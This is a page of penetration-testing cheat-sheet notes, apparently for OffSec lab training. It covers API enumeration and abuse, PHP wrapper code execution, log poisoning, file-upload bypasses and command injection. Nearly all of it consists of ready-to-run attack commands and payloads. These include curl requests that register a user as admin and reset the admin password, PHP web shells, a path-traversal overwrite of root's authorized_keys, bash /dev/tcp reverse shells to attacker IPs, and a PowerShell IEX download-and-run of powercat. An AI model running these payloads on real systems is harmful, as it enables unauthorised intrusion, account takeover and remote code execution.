๐Ÿ Enumerating and Abusing APIs

Enumerating and Abusing APIs

  1. Create file pattern and paste below API pattern for fuzzing

{GOBUSTER}/v1 
{GOBUSTER}/v2

  1. And run the below gobuster command for API fuzzing:

gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern 
ffuf -c -u http://192.168.50.16:5002/FUZZ/v1 -w /usr/share/wordlists/dirb/big.txt -mc 405 
curl -i http://192.168.50.16:5002/users/v1    ###list users in json format 
 
###Fuzz for API endpoints at admin 
gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt  
 
### Other Common end points 
curl -i http://192.168.50.16:5002/users/v1/admin/password  ###password End point found   
curl -i http://192.168.50.16:5002/users/v1/login   ###login end point  
curl -i http://192.168.50.16:5002/users/v1/register   ###register end point  
 
###Registering user offsec as an admin 
curl -d '{"password":"lab","username":"offsec","email":"[email protected]","admin":"True"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register 
 
###Login to offsec user to grab auth_token 
curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login 
 
 
###Changing the password of admin user using offsec auth_token 
curl -X 'PUT' \ 
  'http://192.168.50.16:5002/users/v1/admin/password' \ 
  -H 'Content-Type: application/json' \ 
  -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzE3OTQsImlhdCI6MTY0OTI3MTQ5NCwic3ViIjoib2Zmc2VjIn0.OeZH1rEcrZ5F0QqLb8IHbJI7f9KaRAkrywoaRUAsgA4' \ 
  -d '{"password": "pwned"}' 
 
 
###Finally, Login to the admin user 
curl -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login 
 
 
 
 
http://192.168.208.16:5002/users/v1/login 
http://192.168.208.16:5002/users/v1/register 
 
 
 
 
data://text/plain,<?php phpinfo();?> 
 
echo -n '<?php echo system($_GET["cmd"]);?>' | base64 
 
curl "http://example.com/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

Log Poisoning

###LFI already found in 'page' parameter 
?page=../../../../../../../../../var/log/apache2/access.log    ###apache log file path 
 
###Steps to perfom an attack: 
1. Capture request of: http://192.168.208.16/meteor/index.php?page=admin.php 
2. Change User-Agent value to: <?php echo system($_GET['cmd']); ?> 
3. Execute Command: ?page=../../../../../../../../../var/log/apache2/access.log&cmd=<COMMAND> 
 
###Gaining Shell (Note: bash One-liner reverse shell must be url encoded) 
?page=../../../../../../../../../var/log/apache2/access.log&cmd=bash -c "bash -i >& /dev/tcp/AttackerIP/4444 0>&1" 
 
 
#####WINDOWS (PATH: C:\xampp\apache\logs\access.log) 
1. Capture request of: http://192.168.208.16/meteor/index.php?page=admin.php 
2. Change User-Agent value to: <?php echo system($_GET['cmd']); ?> 
3. http://192.168.208.193/meteor/index.php?page=../../apache/logs/access.log&cmd=<COMMAND>

File Upload Vulnerabilities

Other Methods to upload file: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

[+] Simple file upload: Upload malicious file > Find path where it uploaded > ๐Ÿ’ฅExecute it๐Ÿ’ฅ

Simple Bypass (Extension modification)

PHP Code: <?php echo system($_GET['cmd']); ?>

  1. Capture the malicious upload file request in burpsuite.

  2. Change extension to .pHP, php5, phtml etc. and also use application/x-php header. Lastly upload the file.

  3. ๐Ÿ’ฅExecute the file๐Ÿ’ฅ

Non-Executable File Abuse

  1. First generate the SSH keys with ssh-keygen

  2. Output the content of .pub file in authorized_keys using this command: cat <filename>.pub > authorized_keys

Note: delete rm ~/.ssh/known_hosts file to avoid error

  1. Upload authorized_keys file and Capture the authorized_keys upload file request in burpsuite.

  2. Change the filename to `../../../../../../root/.ssh/authorized_keys

  3. Lastly, login via ssh using private key ssh <user>@$IP -i id_rsa

Command Injection

[+] snippet for checking if our commands are executed by PowerShell or CMD

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell 
archive=https://github.com/projectdiscovery/subfinder.git%3bipconfig

bash -c "bash -i >& /dev/tcp/192.168.45.246/9001 0>&1"

../../apache/logs/access.log

IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.246:8888/powercat.ps1');powercat -c 192.168.45.246 -p 9001 -e powershell

PreviousPage 1NextPage 3

Last updated

Was this helpful?